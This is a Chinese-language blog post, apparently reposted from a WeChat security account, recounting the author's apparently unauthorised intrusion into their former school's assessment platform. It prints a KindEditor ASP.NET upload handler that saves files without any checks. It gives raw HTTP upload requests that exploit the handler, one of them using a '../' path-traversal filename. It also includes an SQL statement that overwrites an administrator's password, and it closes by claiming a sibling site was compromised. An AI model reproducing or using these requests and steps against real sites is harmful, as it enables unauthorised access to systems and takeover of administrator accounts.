0x01 初探其境
通过 Fofa 搜索关键词找到了母校的xx考核平台. http://xxxxxx.xxxxx.com/
https://fsw.xxxxxxxx.com/ 网站导航http://tianamo.xxxxxxxx.com/ xx系统http://rongssheng.xxxxxxxx.com/ shellhttp://chunldai.xxxxxxxx.com/ xx系统http://yifanaweb.xxxxxxxx.com/ xx系统http://sanruishe.xxxxxxxx.com/ xx系统http://fangyuanshaop.xxxxxxxx.com/ 新xx系统
<%@ WebHandler Language="C#" Class="uploadStatus" %>/*** KindEditor ASP.NET** ?ASP.NET???????,???????????????* ????????????,????????????????**/using System;using System.Collections;using System.Web;using System.IO;using System.Globalization;using LitJson;using BBYCMS.Include;using System.Threading;using System.Web.SessionState;public class uploadStatus : IHttpHandler, IRequiresSessionState{private HttpContext context;public void ProcessRequest(HttpContext context){string act = context.Request["act"] != null ? context.Request["act"].ToString() : "";if (act == "upload"){if (context.Request.Files.Count > 0){HttpPostedFile file = context.Request.Files[0];FileStream fs = File.Create(context.Server.MapPath("/Upload/") + file.FileName);BinaryWriter bw = new BinaryWriter(fs);BinaryReader br = new BinaryReader(file.InputStream);int filelength = file.ContentLength;int readcount = 0;int nowcount = 0;int bytelength = 500;byte[] buffer = new byte[bytelength];while ((readcount = br.Read(buffer, 0, bytelength)) > 0){nowcount += readcount;bw.Write(buffer, 0, readcount);bw.Flush();}fs.Close();fs.Dispose();bw.Close();bw.Dispose();br.Close();br.Dispose();}else{context.Response.Write("nofile");}context.Response.End();}}public bool IsReusable{get{return true;}}}
POST /Editor/upload_status.ashx?act=upload HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7Cache-Control: no-cacheConnection: keep-aliveContent-Length: 193Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUB5wmNn272Yoe3vXHost: xxx.comOrigin: http://xxx.comPragma: no-cacheReferer: http://xxx.com/Editor/upload_status.ashx?act=uploadUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36----WebKitFormBoundaryMXNLGZirKX5UAvYGContent-Disposition: form-data; name="file";filename="../Deep.txt"Content-Type: image/jpegFastJson----WebKitFormBoundaryMXNLGZirKX5UAvYG-
update bby_admin set password='xxxxxxxxxxxxxxxxxxxxxxxxxxx' where id=2;
POST /Editor/upload_more.ashx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7Cache-Control: no-cacheConnection: keep-aliveContent-Length: 199Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPx5fvopwpxvGTK8XCookie: ASP.NET_SessionId=vlbohnzdnpcmctk114nfdu1y; Hm_lvt_435e182a23ec27c138d9a76034bdbd58=1683892979; Hm_lpvt_435e182a23ec27c138d9a76034bdbd58=1683892979Host: xxxxx.xxxxxx.comOrigin: http://xxxxx.xxxxxx.comPragma: no-cacheReferer: http://xxxxx.xxxxxxx.com/Editor/upload_more.ashxUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36----WebKitFormBoundaryMXNLGZirKX5UAvYGContent-Disposition: form-data; name="imgfile";filename="Deep.txt"Content-Type: image/jpegFastJson----WebKitFormBoundaryMXNLGZirKX5UAvYG-
点到为止,不进行更深入层次的渗透了 省流版:旁站拿下
原文始发于微信公众号(星悦安全):记一次对母校渗透过程
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论